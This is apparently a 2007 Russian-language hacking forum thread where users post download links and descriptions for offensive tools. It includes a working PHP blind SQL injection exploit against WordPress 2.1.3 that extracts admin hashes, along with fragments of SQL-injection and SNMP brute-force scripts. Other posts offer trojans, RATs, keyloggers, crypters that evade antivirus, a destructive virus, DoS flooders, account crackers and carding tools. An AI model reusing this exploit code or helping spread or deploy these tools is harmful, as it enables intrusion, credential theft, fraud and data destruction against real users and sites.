Автор: Creeping Death 26.03.2007, 16:08
Blueprint (V. 0.1-3) - a perl tool to identify Bluetooth devices
This version recognizes about 53 different devices.
http://trifinite.org/Downloads/bp_v01-3.zip
Автор: is) 27.03.2007, 21:52
UDC программа, созданная для быстрого восстановления пароля по хэш-значению для различных алгоритмов хэширования (более 40: MD5, NTLM, DES, MD4, SHA...).
* Обычному пользователю она поможет при восстановлении забытых паролей (например, подбор пароля в Windows), благодаря поддержке уникального мгновенного режима восстановления пароля, по похожей на него строке.
* Организации могут восстанавливать пароли к неограниченному числу пользователей одновременно, практически без потери скорости; при помощи UDC, администрация форума может за пару секунд выявить все "слабые" пароли в системе.
* Для решения более серьезных переборных задач поможет поддержка многопроцессорных систем и автоматического распределения атаки в реальном времени.
Текущая версия ядра - 2.0.9.2, обновление от 23 марта 2007 (http://the-udc.com/rus/download.html)
Новости, комментарии, помощь и словари вы найдете на нашем форуме (http://the-udc.com/forum/)
Получить полную версию UDC бесплатно! (http://the-udc.com/forum/index.php?topic=33.0)
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Gener 22.04.2007, 18:33
Metasploit Framework (согласно описанию) это законченная среда для написания, тестирования и использования кода эксплойтов. Эта среда обеспечивает надежную платформу для испытаний на проникновение, разработки шелкодов и исследования уязвимостей". Написан на Perl (с некоторыми частями на ассемблере, Python и C) – отсюда нет привязки к какой либо платформе – будет работать в любой системе, где есть интерпретатор Perl`a (с оговоркой, см. дальше). На данный момент, пакет Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас. Скачать последнюю версию пакета для соответствующей ОС можно здесь: http://www.metasploit.com/ (Среда под Windows базируется на доработанном Cygwin, что удобно, т.к. это дает пользователю извесную консоль. Однако, были некоторые проблемы с поддержкой Active Perl, поэтому поддерживается только Cygwin Perl.
Вот прямые линки для скачивания последней версии:
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Gener 25.04.2007, 20:17
Mail.ru Loginer Free
Чекер мыл на сервера mail.ru (и всех поддоменах) +малый траф (13 мыл примерно 24 кб) +высокая скорость работы +работает с парсеными логами +drag&drop файла в окно программы с распознованием его типа
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
пароль: mcbobo
Автор: Creeping Death 6.05.2007, 18:32
Cнимаем пароли. небольшой список программ.
Windows Password Recovery Bootdisk 1.0.0.1 http://www.rixler.com/eng/download/bootdisk.zip
Internet Password Recovery Toolbox 1.3.0.2 http://www.rixler.com/eng/download/iprtbox.zip
Internet Explorer Password Recovery Master 1.4.0.4 http://www.rixler.com/eng/download/iepasrec.zip
Outlook Express Password Recovery Master 1.2.0.4 http://www.rixler.com/eng/download/oepasrec.zip
Zip Password Recovery Master 6.2.0.0 http://www.rixler.com/download/zipprm.exe
Computer Lock Up 1.0.0.4 http://www.rixler.com/eng/download/complock.zip
Автор: Creeping Death 6.05.2007, 18:45
Genom-mail.ru bruter http://genom.h10.ru/1111.rar
Автор: Creeping Death 8.05.2007, 23:01
Скрипт для проверки на sql-инъекцию, переборо количества столбцов и имен таблиц по словарю.
CODE
#!/usr/bin/perl #=========================================================================# use LWP::UserAgent; use Getopt::Std; #=========================================================================#
#=========================================================================# #=MAIN===================================================================# print "\n AAAAAA OOOOOO H H\n"; print " A A O O H H\n"; print " AAAAAA O O HHHHH\n"; print " A A O O H H\n"; print " A A OOOOOO H H\n\n"; $filt=1; #only chars in resolt my $www = LWP::UserAgent->new; uss(); if(!$ARGV[0]) { ans(); while (true) { print "\nNew file (^c for quit) ->"; $f=<STDIN>; $f =~ s/\n//; enc(); #encode file burl(); conn(); getres(); } } if ($ARGV[0] eq '-b') { print "Url for brute-> "; $u=<STDIN>; $u =~ s/\n//; brute(); } if ($ARGV[0] eq '-t') { print "Url for brute-> "; $u=<STDIN>; $u =~ s/\n//; brute_table() } #=END=MAIN============================================================# #=======================================================================#
sub uss() { print 'AOH SQL INJECTION TOOL By AoH]Slon and AoH]GvOzDiK'."\n"; print '-b for brute colouns'."\n"; print '-t [dictionary_table] for brute tables and colouns'."\n\n"; }
Автор: Creeping Death 9.05.2007, 12:43
GFS-webshell ver 4.0.0.0 Возможности: 1. Удобная навигация по файловой системе жертвы 2. Закачка файлов на сервер жертвы 3. Работа с MySQL 4. Бинд портов и бэкконект 5. Скан портов 6. Брут фтп и MySQL различными способами
Acunetix Web Vulnerability Scanner Acunetix Web Vulnerability Scanner automatically detects the following vulnerabilities in web applications: · Cross site scripting · SQL injection · CRLF injection · Code execution · Directory traversal · File inclusion · Script source code disclosure · Discovers files/directories that may contain sensitive information · Looks for common files (such as logs, application traces, CVS web repositories), back-up files or directories · Finds directory listings · Discovers directories with weak permissions · Discovers available web server technologies (such as WebDAV, FrontPage, etc.) · Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE) · Inspects the HTTP version banners and looks for vulnerable products · Tests password strength of applications. Extend attacks · With Acunetix Web Vulnerability Scanner, you can construct HTTP/HTTPS requests and analyze the responses using the HTTP editor. Connection spy · By enabling you to log, intercept and modify all HTTP/HTTPS traffic, Acunetix Web Vulnerability Scanner gives you an in-depth insight into what data your web application is sending. Test password strength · To test the strength of your passwords, you can perform a dictionary attack on basic HTTP, NTLM or form-based authentication. Test database editor · Acunetix Web Vulnerability Scanner includes a text database editor that permits you to add additional attacks to the test database (Enterprise & Consultant versions only). Supports all major web technologies · Applications utilizing CGI, PHP, ASP, ASP.NET can all be tested for vulnerabilities. Scanning profiles · Acunetix Web Vulnerability Scanner allows you to quickly scan sites with different options and identities. Reporting · You can save scan sessions to MS SQL Server/Access databases and generate complex reports from previous scan sessions using information stored in the database.
Requirements:
· 128 MB of RAM (256MB or higher recommended) · 200 MB of available hard-disk space · Microsoft Internet Explorer 5.1 (or higher) · Microsoft SQL Server / Access if database is enabled (optional)
Limitations:
· 30 day trial · The evaluation version is identical to the full version, however you will only be able to scan the Acunetix test websites add you will not be able to save the scan results
PacketCreator 1.1 PacketCreator is provided to help network administrators to test their network, by using ARP cache poisoning, and generate ICMP packets to send over the LAN. The main idea is to allow administrators using these kind of software to secure their network to several known attacks. This tool can also redirect switched based networks traffic (dumping and forwarding is also provided). It is possible to create a own made IP packet in which you can edit IP header or every ICMP field.
DoSHTTP is an easy to use and powerful HTTP Flood Denial of Service (DoS) Testing Software for Windows. DoSHTTP includes URL Verification, HTTP Redirection and performance monitoring. DoSHTTP uses multiple asynchronous sockets to perform an effective HTTP Flood. DoSHTTP can be used simultaneously on multiple clients to emulate a Distributed Denial of Service (DDoS) attack. DoSHTTP can help IT Professionals test web server performance and evaluate web server protection software. DoSHTTP was developed by certified IT Security and Software Development professionals. Here are some key features of "DoSHTTP": · Easy to use and powerful HTTP Flood Denial of Service (DoS) Testing Tool · Uses multiple asynchronous sockets to perform an effective HTTP Flood · Allows multiple simultaneous clients to emulate a Distributed Denial of Service (DDoS) Attack · Supports HTTP Redirection for automatic page redirection (optional) · Includes URL Verification that displays the response header and document · Includes Performance Monitoring to track requests issued and responses received · Allows customized User Agent header fields · Allows user defined Socket and Request settings · Supports numeric addressing for Target URLs · Includes a comprehensive User Guide Requirements: · DoSHTTP must be used with an administrative account. Limitations: · Free 14-Day Trial
Nsauditor Network Security Auditor 1.6 Nsauditor reveals a variety of information, including installed software, users, shares, hotfixes, NetBios, drives, RPC, SQL and SNMP information, open ports.
Nsauditor Network Security Auditor is a network security scanner that allows to audit and monitor remote network computers for possible vulnerabilities, checks your network for all potential methods that a hacker might use to attack it.
Nsauditor is a complete networking utilities package that includes a wide range of tools for network auditing, scanning, monitoring and more.
You can discover network services and check them for vulnerabilities, list all TCP and UDP endpoints with their associated process, discover NetBios names, audit MS SQL servers, scan for common Adware traces and more.
The program also includes real-time network packet filtering and analyzing, remote network performance monitoring, network status monitoring, web proxy scanning, password auditing, intrusion detection system based on security events log analyzer and firewall system that allows to stop internet threats and block unwanted network connections, IP address lookup and more than 45 network tools for scanning, sniffing, enumerating and gaining access to machines, DNS and WHOIS lookups, e-mail validation and HTTP traffic generator.
The product contains a built-in database of known network security vulnerabilities, which allows you to select the items for scanning and add custom entries. Nsauditor can reveal and catalog a variety of information, including installed software, shares, users, drives, hotfixes, NetBios, RPC, SQL and SNMP information, open ports.
Nsauditor Network Security Auditor can also audit password and security policies as well as make a variety of network attack probes, such as stealth port scans, HTTP / CGI server auditing, registry auditing.
Nsauditor Network Security Auditor can sniff and use brute-force and dictionary attacks on LM and NTLM password hashes and expose the insecure ones.
Nsauditor does OS detection and automatically creates OS fingerprints which are not included in database. Reports can be generated in HTML and XML format.
CC2Bank 1.3 Описание: Эта программа поможет вам получить дополнительную информацию о банке сделавшем кредитную карточку. http://soft.verified.ru/files/databases/cc2bank/cc2bank_1.3/cc2bank13.rar http://soft.verified.ru/files/databases/cc2bank/cc2bank_1.3/hash.txt
CC2Bank ListGenerator 1.0
Описание: Прога ищет в текстовом фале номера кредитных каточек и подбирая к номеру информацию о банке выводит в список. Потом данные можно сортировать на своё усмотрение и сохранять в отдельный файл. http://soft.verified.ru/files/databases/cc2bank_listgenerator/cc2bank_listgenerator_1.0/cc2banklg10.rar http://soft.verified.ru/files/databases/cc2bank_listgenerator/cc2bank_listgenerator_1.0/hash.txt
Mars Banks Base 1.1
Описание: База данных по банкам. Содержит 11 баз: ABA номера банков США, routing номера банков США, БИНы кредитных карт для VISA, MasterCard, American Express, ZIP коды США, занятые телефоны США, регионы SSN, телефонные коды США, штаты США, штаты UK. Поддерживает поиск и фильтрацию, скины...
Представляю свою [автор программы - begin end] версию программы класса джоинеров - BEJoiner. Она полностью бесплатна.
Характеристика и возможности: -упаковка неограниченного числа файлов; -смена иконки на любую из *.ico файла; -компрессия пакером (UPack); -малый размер стаба (в чистом виде 1,4 кбайт); -на 12.05.2007 в плане проверки антивирусами полностью чист.
Просьба не распростанять эту программу дальше этого форума.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
Language: delphi Description: bind as many files as you like make them all undetected run binded files in memory/ extract them to file run hidden/visible with parameters. server supports many parameters. choose output icon. save & reload projects.
AntiDote v1.2 antidote 1.2 osce compress and scrambles servers and trojans in order to make them undetected. http://rapidshare.com/files/32244567/AntiDote_v1.2_osCE.rar
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
Автор: Creeping Death 22.05.2007, 22:45
avkhack keylogger
» Нажмите тут чтобы открыть/скрыть спойлер. «
Antivirus Result AhnLab-V3 no virus found AntiVir no virus found Authentium no virus found Avast no virus found AVG no virus found BitDefender no virus found CAT-QuickHeal no virus found ClamAV no virus found DrWeb no virus found eSafe no virus found eTrust-Vet no virus found Ewido no virus found FileAdvisor no virus found Fortinet no virus found F-Prot no virus found F-Secure no virus found Ikarus no virus found Kaspersky no virus found McAfee no virus found Microsoft no virus found NOD32v2 probably a variant ofWin32/Spy.VB.Qd Norman no virus found Panda no virus found Prevx1 no virus found Sophos no virus found Sunbelt no virus found Symantec no virus found TheHacker no virus found
return $out; } /////////////////////////////////////////////////////////////////////// function get_hashchar($field,$pos) { global $prefix, $suffix, $id, $testcnt; $char = ''; $cnt = $testcnt * 4; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
// First let's determine, if it's number or letter $inj = sprintf($ipattern, $prefix, $id, ">57"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $letter = test_condition($post);
if($letter) { $min = 97; $max = 102; echo "char to find is [a-f] "; } else { $min = 48; $max = 57; echo "char to find is [0-9] "; }
<?php error_reporting(E_ALL); $norm_delay = 0; /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// // WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit // written by Janek Vind "waraxe" // http://www.waraxe.us/ // original version released - 21. may 2007 // added login retrieving - 23. may 2007 /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// //===================================================================== $outfile = './warlog.txt';// Log file $url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php'; $testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000 $id = 1;// ID of the target user, default value "1" is admin's ID $suffix = '';// Override value, if needed $prefix = 'wp_';// WordPress table prefix, default is "wp_" $get_hash = true;// md5 hash retrieving - true or false $get_login = true;// user login retrieving - true or false //======================================================================
echo "
WordPress 2.1.3 blind sql injection exploit by waraxe
echo " Work finished "; echo "Questions and feedback - http://www.waraxe.us/ "; die("See ya! "); /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// function get_login() { $field = 'user_login'; $out = '';
echo "first we need user login length ... "; $len = get_length($field, 60); echo "user login length is $len chars "; echo "finding user login now ... ";
return $char; } /////////////////////////////////////////////////////////////////////// function get_hashchar($field,$pos) { global $prefix, $suffix, $id, $testcnt; $char = ''; $cnt = $testcnt * 4; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
// First let's determine, if it's number or letter $inj = sprintf($ipattern, $prefix, $id, ">57"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $letter = test_condition($post);
if($letter) { $min = 97; $max = 102; echo "char to find is [a-f] "; } else { $min = 48; $max = 57; echo "char to find is [0-9] "; }
Hippi virus Virii.exe Summary : -Modifies registry so that the user can't run any exe, bat, ini, inf, reg files anymore .. -Disables ALL exe's on computer including regedit, cmd, ... -Deletes restore settings -Modifies files of LastKnownGood Configuration changes SystemFolder & Windows folder so it will be much worse to start with LastKnownGood configurations to repair virii -Modifies usb mass storage drivers and usb driver to make sure that the user can't backup his data, disables access to new usb drivers -Windows can't be reinstalled because it gives error "rundll32.exe" can't be opened. HDD should be formatted first to install windows. -3KB, completely undetectable ... Tested in WinXP Sp1 & Sp2 NE TESTAT http://rapidshare.com/files/33923095/virii.exe.html
Google Hacker 1.2 Небольшая софтинка упростит нашу задачу. теперь не придется в n-ый раз за вечер, общаться с гуглем. она все сделает на вас=) http://rapidshare.com/files/34419081/Google_Hacker_1.2.rar.html
SuperScan is a powerful TCP port scanner, pinger and hostname resolver. /*впринципе, ничего особенного*/ http://rapidshare.com/files/34425920/superscan.rar.html
yahooUltraCracker Powered By ArvinHacker =)) http://rapidshare.com/files/34425613/yahooUltraCracker.rar.html
Craven's Spam a Forum довольно-таки шустрый и удобный http://rapidshare.com/files/34425480/UC.Forum_Spam.rar.html
Pure phpBB emali Extractor http://rapidshare.com/files/34425252/phpBB-Hack-Pack-ver1_1_.0.rar.html
CryptX 1.0 Public Date: 4/20/2007 Platforms: All Windows Platforms Undetectable as of 4/20/2007. -RAR Password- cryptX NOTE: For each crypted file, the crypted file will copy itself to the index directory (Where you launched CryptX from, and will save it as crypted.exe) You'll need to put that file into a new file location. NOTE: When CryptX is unloaded, it'll cause an invalid window call, just click Cancel or No, on debug, and everything is saucy. ::Disclaimer:: In no way am I responsible for any unethical/illegal useages of CryptX! Please use this CryptX was made for educational purposes only. Please use this at your own risk. ::How it works?:: CryptX adds false code by Denoted bits of data to the PE Header and Entry point, thus confusing anti-virus hueristics. on randmomized 33555.59 Data variation. (the more you crypt the binary, the more different the outcome will be) Some notes: After you've crypted the binary you may find it useful to pack it with a PE Packer. I recommend MEW 11, as being the most reliable and effective for packing distributable binaries. Please use this at your own risk, as I am not responsible for any damage or data loss using CryptX. Enjoy CryptX! Undetectable Status FUNCTIONALITY AND STABLIZATION AFTER CRYPTED MAY VARY, AND DEPENDING ON EACH VARIANT MAYBE DIFFERENT FROM ANOTHER. I CRYPTED ONE OF EACH OF THE FOLLOWING TROJANS, THEREFOR I AM JUST MAKING A "LOGICAL" GUESS THAT IT WILL MAKE THE OTHER VARIATIONS THE SAME.] MoSucker - all variations. SubSeven - all variations. C.I.A - all variations. Net Devil - all variations. Optix Pro - all variations. DoS 5.5 - all variations. Assorted Virii, worms, et cetera effectivelly made undetected by CryptX 1.0 If you crypt MyDoom, or some other serious shit, don't be dumb, and re-populate it. Thanks.
Chimera автор: Kuzya При запуске chimera прописывает себя в реестре и открывает на 10000 порту фтп сервер. Небольшая особенность здесь в том, что бродя по папкам заражённого компа Вы всегда будете видеть дополнительные папки с именами имеющихся дисков - то есть из любой директории любого диска Вы можете попасть в корень другого диска. Трой написан на делфи 6. Весит 176кб. На момент публикации антивирусами не палится. Единственная известная пока бага: если заражённый имеет несколько IP-адресов то к фтп серверу можно подключится только через один IP из этих нескольких.
ProxyFuzz is a man-in-the-middle non-deterministic network fuzzer written in Python. ProxyFuzz randomly changes (fuzzes) contents on the network traffic. It supports TCP and UDP protocols and can also be configured to fuzz only one side of the communication. ProxyFuzz is protocol agnostic so it can randomly fuzz any network communication.
ProxyFuzz is a good tool for quickly testing network protocols and provide with basic proof of concepts. Using this tool you will be amazed by the poor quality of software and you will see clients and servers dying upon unexpected input, just be prepared to see the very weird behaviours.
Syntax of ProxyFuzz:
ProxyFuzz 0.1, Simple fuzzing proxy by Rodrigo Marcos
-w: Number of requests to send before start fuzzing
-c: Fuzz only client side (both otherwise)
-s: Fuzz only server side (both otherwise)
-u: UDP protocol (otherwise TCP is used)
-v: Verbose (outputs network traffic)
-h: Help page http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.py http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.zip
Wfuzz - The web bruteforcer
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.
It's very flexible, here are some functionalities:
* -Recursion (When doing directory bruteforce) * -Post data bruteforcing * -Output to HTML (easy for just clicking the links and checking the page, even with postdata!!) * -Colored output on all systems * -Hide results by return code, word numbers, line numbers, etc. * -Url encoding * -Cookies * -Multithreading * -Proxy support * -All parameters bruteforcing (POST and GET) * -Dictionaries tailored for known applications (Weblogic, Iplanet, Tomcat, Domino, Oracle 9i, Vignette, Coldfusion and many more. (All dictionaries are from Darkraver's Dirb, www.open-labs.org)
AWexploder helps you to find virtual hosts for a given IP address and looks for a CMS in each virtual host. In this version it looks for OpenSourceCMS's. More cms's will be added in later verions.
http://www.edge-security.com/soft/AWexploder.tar
Автор: Creeping Death 16.06.2007, 10:16
Hackers Fantastic KIT
CrackersKit 2005 Golden eye 2005 HellLabs Proxy Checker v7.4.18 HostScan v1.6.5.531 Invisible Browsing v4.0 IPScanner v1.86 Ascii Factory 0.6 Cool Beans NFO Creator v2.0.1.3 Dizzy v1.10 Feuer's NFO File Maker v2.0 Ims NFO&DIZ Maker 1.87 Inserter v1.12 NFO Creator v3.5.2 NFO Maker 1.0 Patchs All In One 2005 SoftIce 4.05 -Win 2000-XP IP Address Scanner IP Calculator IP Converter Port Listener Port Scanner April 2005 Ping NetStat 2005 Cool Trace Route 2005 TCP/IP Configuration Online - Offline Checker Resolve Host & IP Time Sync Whois & MX Lookup Connect0r Connection Analysator and prtotector Net Sender April 2005 E-mail seeker Cool Net Pager Active and Passive port scanner Spoofer Hack Trapper HTTP flooder (DoS) Mass Website Visiter Advanced Port Scanner Trojan Hunter Multi IP April 2005 Port Connecter Tool Advanced Spoofer Cool Advanced Anonymous E-mailer April 2005 Simple Anonymous E-mailer Anonymous E-mailer with Attachment Support Mass E-mailer E-mail Bomber E-mail Spoofer Simple Port Scanner (fast) Advanced Netstat Monitoring X Pinger Web Page Scanner Cool Fast Port Scanner Deep Port Scanner Fastest Host Scanner (UDP) Get Header Open Port Scanner Multi Port Scanner HTTP scanner (Open port 80 subnet scanner) Multi Ping for Cisco Routers TCP Packet Sniffer UDP flooder Cool Resolve and Ping Multi IP ping File Dependency Sniffer EXE-joiner Encrypter Advanced Encryption File Difference Engine File Comparasion Mass File Renamer Add Bytes to EXE 5Cool Cool Variable Encryption 59) Simple File Encryption 60) ASCII to Binary Enigma Password Unmasker Credit Card Number Validate and generate Create Local HTTP Server eXtreme UDP Flooder Web Server Scanner Force Reboot Cool Webpage Info Seeker Bouncer Advanced Packet Sniffer IRC server creater Connection Tester Fake Mail Sender Bandwidth Monitor Remote Desktop Protocol Scanner MX Query Messenger Packet Sniffer Cool API Spy DHCP Restart File Merger E-mail Extractor (crawler / harvester bot) Open FTP Scanner Fast Patch Predator's Extreme Loader Generator 0.3 Srlzer - Patch generator Yoda's Process Patcher Buddha Patch File Creator 2.2 CodeFusion Cool Beans NFO Creator 2.0.1 build 3 Patch Creation Wizard v1.2 Patch On The Fly v0.75 Rlzer RTD - WINpatch v1.0 Tola's Patching Engine
UnDo Crypter UnDo Crypter Public Version * Currently Undetectable from all AntiVirus * Stub size is 4.50kb packed with UPX * has a small compression ratio for unpacked files bifrost server example 28.3kb / 32.8kb crypted
source code and private versions are for sale (contact i.am.noble.com@gmail.com for details)
sharK is an advanced remote administration tool written in VB6. With sharK you will be able to administrate every PC in the world (using Windows OS) remotely. Here are some facts:
* sharK uses RC4 to encrypt the traffic * sharK is able to resume downloads and uploads when the server disconnects on the next connect * Compressed Transfers * Thumbnail Previews of Pictures * Keylogger works with Keyboard hooking * You have a real DOS-Shell instead of dos-output like in the most rats * Interactive Process Blacklist * Virtual-Machine detection * Double-Compression in Screencap & Webcam-Capture
And much much more. SharK is designed for professional remote administration, so you don’t have colourfull buttons etc and can enjoy lot’s of rightclick-menus and hotkeys and stuff like histograms. - - - - - - - - - - - - - - - - - - - - - - - - in 2.1.3 + = New Feature * = Bugfix
[+] You can show additional informations like AV/FW/Webcam/Browser in the SIN Console [+] Raring Folders possible [+] Broadcast-Download Possible [*] Client didn't show interval correctly when loading settings [*] Client doesn't show up the versionnumber twice in systray [+] Menuitems can be collapsed automaticially [*] Put zlib.dll inside the archive so screencap works for all Razz [*] Group-Functions had big bug
-MailerX = You can spam with email! (it contains an smtp server) -PHP Attacker = is a program that allow you to run exploitz on a website.(php) -PhpNuke = Is a program that allows you to make sql injection on phpnuke sites (IT WORKS IS AWESOME) -PHP-Nuke_Hacker = is a program that allow you to run exploitz on any website finding exploits from www.milw0rm.com -IFRAME_DDoS_v1[1].0= You can flood a website with multiple connections -Reuploaded=is a webnuker for websites! (it works great) -ICMP DoS=You can flood a website -IP_Hider_v2[1].7_-xray-=Is a good one for hiding you ip..(i am using it) -PP-checker=Paypal checker to hack paypal accounts -BrutusAET2 Host by HybriD3_2= one of best bruteforces ever -evilsmiley= an .exe file that an evil face with an evil smiley appears on your monitor and u cant do anything ( a funny one ) -CSF-(c-sploiter final)= i will let you to check this out alone -AntiDote_v1[1].2_osCE=To make a trojan undetected! -Nudge_Madness=basicly is an autoclicker -msn-nudger=it spams your contacts with nudges -YouTUBE_downloader_2.1.1=you can download the videos on youtube with this program -MEssBlackFrezzerBeta=You can freeze someone's account on msn -bugs.txt= a text file that contains different bugs like a site could have... -sploof_v0.90.installer= a program to try a website's security.... -proxylist.txt = contains proxies -proxies.txt= contains proxies -ipsteales = is a shell that helps you to steal someone's ip
- - - - - - ИМХО,3-, но может кому-нибудь пригодится;)
http://rapidshare.com/files/37798225/pack.rar
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
Автор: Creeping Death 19.06.2007, 12:26
Mirkov4 v1.1
Mirkov4, a remote administration tool over http. It currently features desktop interaction (ala VNC), naviguation through the computer drives, download/upload/removal of files, execution of commands and a display of current running processes.
проверено под Win2003 with NOD32. коннект- через брауз http://ip_vitima:7887
+new file transfer manager pause/resume your transfers hopefully more stable ~server updates new identication imediatly ~changed compression engine (smaller server) -removed registry editor and plugins will add again soon (improving) ~server 90% re-write +most data compressed between client and server compressed +HKLM and HKCU startup methods re-added +ability to change mutex name +added option to direct connect - still very usefull ~improved transfers stabilty ~persistance option improved ~socket connections improved ~changed stupid two letter varibales main window ~show extension version outdated extension version showed in red. +added dockable windows for connections,transfers + windows system information +added %IDLETIME% varibale get time away from keyboard + mouse file manager +drag drop files to upload +goto folder with links for most folders screen cap +speed improved Ura +change image bitcount when using bitmap webcam +option to select webcam driver keylogger +online key logger other lil things +added option to auto upload extension ~bold group names optional +added skin support - not yet implemented
http://rapidshare.com/files/38079500/Slh_4.0.rar
Автор: Creeping Death 21.06.2007, 20:38
The Punisher Trojan
Antivirus Version Update Result AhnLab-V3 2007.6.20.1 06.20.2007 no virus found AntiVir 7.4.0.34 06.20.2007 no virus found Authentium 4.93.8 06.19.2007 no virus found Avast 4.7.997.0 06.20.2007 no virus found AVG 7.5.0.467 06.19.2007 no virus found BitDefender 7.2 06.20.2007 Generic.Malware.SDbTk.997E24F1 CAT-QuickHeal 9.00 06.19.2007 no virus found ClamAV devel-20070416 06.20.2007 no virus found DrWeb 4.33 06.20.2007 WIN.SCRIPT.Virus eSafe 7.0.15.0 06.19.2007 no virus found eTrust-Vet 30.7.3727 06.19.2007 no virus found Ewido 4.0 06.20.2007 no virus found FileAdvisor 1 06.20.2007 no virus found Fortinet 2.91.0.0 06.20.2007 no virus found F-Prot 4.3.2.48 06.19.2007 no virus found F-Secure 6.70.13030.0 06.20.2007 Backdoor.Win32.VB.gen Ikarus T3.1.1.8 06.20.2007 no virus found Kaspersky 4.0.2.24 06.20.2007 Backdoor.Win32.VB.gen McAfee 5056 06.19.2007 VB-BackDoor.a.gen Microsoft 1.2607 06.20.2007 no virus found NOD32v2 2341 06.20.2007 probably unknown NewHeur_PE virus Norman 5.80.02 06.20.2007 no virus found Panda 9.0.0.4 06.20.2007 no virus found Prevx1 V2 06.20.2007 no virus found Sophos 4.18.0 06.12.2007 Mal/VB-F Sunbelt 2.2.907.0 06.09.2007 no virus found Symantec 10 06.20.2007 no virus found TheHacker 6.1.6.136 06.20.2007 no virus found VBA32 3.12.0.2 06.20.2007 no virus found VirusBuster 4.3.23:9 06.19.2007 no virus found Webwasher-Gateway 6.0.1 06.20.2007 no virus found
When the victim open server.exe this will close automatically windows firewall ,nod32 ,sygate firewall ,disable task manager
Server copy: C:\WINDOWS\system32\Svchost32.exe Trojan Name: The Punisher Trojan Server size:294 KB Client Size:1,45 MB Coded In : Visual Basic Author:E.M.I.N.E.M
MessenPass Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView Recovers the passwords of the following email programs: Outlook Express, Mcft Outlook 2000 (POP3 and SMTP Accounts only), Mcft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
Protected Storage PassView Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more...
Dialupass Password recovery tool that reveals all passwords stored in dial-up entries. (Internet and VPN connections) As opposed to many other tools, this tool works in all versions of Windows, including Windows 2000 and Windows XP.
Asterisk Logger Recovers passwords stored behind asterisks (****) characters. You can use this tool to recover the passwords of many applications, like CuteFTP, CoffeeCup Free FTP, VNC, and more...
Network Password Recovery Recover network passwords stored by Windows XP operating system.
SniffPass Password Sniffer Capture the passwords that pass through your network adapter, and display them on the screen instantly. You can use this utility to recover lost Web/FTP/Email passwords.
http://rapidshare.com/files/38772211/PWSniff.rar
Автор: Creeping Death 23.06.2007, 15:58
SBinder
http://rapidshare.com/files/38847479/SBinder.zip
Vulnerability Scanners Pack
+CGI Founder +Cgi Scanner 4 +LanSpy +Libwhisker 2.3 +Nikto +NStealth HTTP Security Scanner 5.8 Free +Retina - For Windows NT +Shadow Security Scanner 7.84 +THC-Amap Version 5.2 +VoidEYE CGI Scanner +Web Check
Surrogafier is an easy to install three tier web proxy written in PHP. It is free to use and distribute under the GNU General Public License (GPL). A demo install of Surrogafier can be found here.
Features include the ability to remove cookies, the HTTP referer field, the HTTP user-agent field, scripts on the page, and objects, altering the user-agent string to whatever you please, and tunnelling your proxied traffic through a second proxy.
If there existed a freely public install of this script, two standard proxies could be used, one entered in the proxy settings of your browser, and one entered into the publicly installed web proxy, to create a connection being passed between three separate proxy servers before hitting the final destination.
Most web sites should be supported by this web proxy. AJAX applications might have problems with Surrogafier, but I would still like to know if an AJAX application is not working. .
The most powerful and effetive password sniffer. Ace Password Sniffer can listen on your LAN and enable network administrators or parents to capture passwords of any network user. Currently Ace Password Sniffer can monitor and capture passwords through FTP, POP3, HTTP, SMTP, Telnet, including some web mail password.
#!usr/bin/python #Uses nmap to check if snmp port is open then uses snmpwalk to try and bruteforce #the community name.
#Required: nmap and snmpwalk
#Changelog: added iprange, single scans and threading for random scans #Changelog: added the ability to add your own wordlist, it will add to #the ones given and erase the duplicates
#http://darkcode.ath.cx #d3hydr8[at]gmail[dot]com
import time, StringIO, commands, sys, re, threading, sets
def timer(): now = time.localtime(time.time()) return time.asctime(now)
